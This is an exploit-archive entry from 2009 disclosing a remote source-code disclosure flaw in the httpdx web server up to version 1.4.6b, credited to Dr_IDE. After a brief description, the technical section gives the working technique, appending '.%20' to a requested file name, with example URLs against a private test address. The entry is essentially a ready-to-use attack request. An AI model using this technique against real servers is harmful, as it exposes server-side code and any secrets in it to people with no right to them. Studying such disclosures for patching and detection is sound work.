[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : httpdx <= 1.4.6b source disclosure
# Published : 2009-10-21
# Author : Dr_IDE
# Previous Title : Joomla Fastball component 1.1.0-1.2 SQL Injection
# Next Title : Boxalino 09.05.25-0421 Directory Traversal


################################################
#
# httpdx <= 1.4.6b Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: httpdx.sourceforge.net/downloads/
#
################################################

- Description -

httpdx Web Server <= 1.4.6b is a Windows based HTTP server. This is the latest
version of the application available.

httpdx is vulnerable to remote arbitrary source code disclosure by the following means.

- Technical Details -

http://[ webserver IP]/[ file ][.%20]

http://172.16.2.101/index.html.%20
http://172.16.2.101/test.py.%20
http://172.16.2.101/test.php.%20

#[pocoftheday.blogspot.com]